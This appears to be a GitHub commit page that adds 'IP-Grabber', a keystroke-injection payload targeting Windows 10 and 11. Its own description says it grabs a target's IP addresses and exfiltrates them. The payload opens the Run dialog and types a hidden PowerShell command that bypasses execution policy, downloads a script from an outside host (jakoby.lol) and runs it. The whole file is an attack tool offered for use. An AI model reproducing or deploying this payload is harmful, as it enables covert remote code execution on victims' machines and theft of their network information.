Create IP-Grabber.txt

This commit is contained in:
I-Am-Jakoby 2023-01-06 22:13:53 -06:00 committed by GitHub
parent 2d4568a737
commit fe2228901f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,12 @@
REM Title: IP-Grabber
REM Author: I am Jakoby
REM Description: This payload is meant to do grab your targets IP addresses and exfil them
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex
ENTER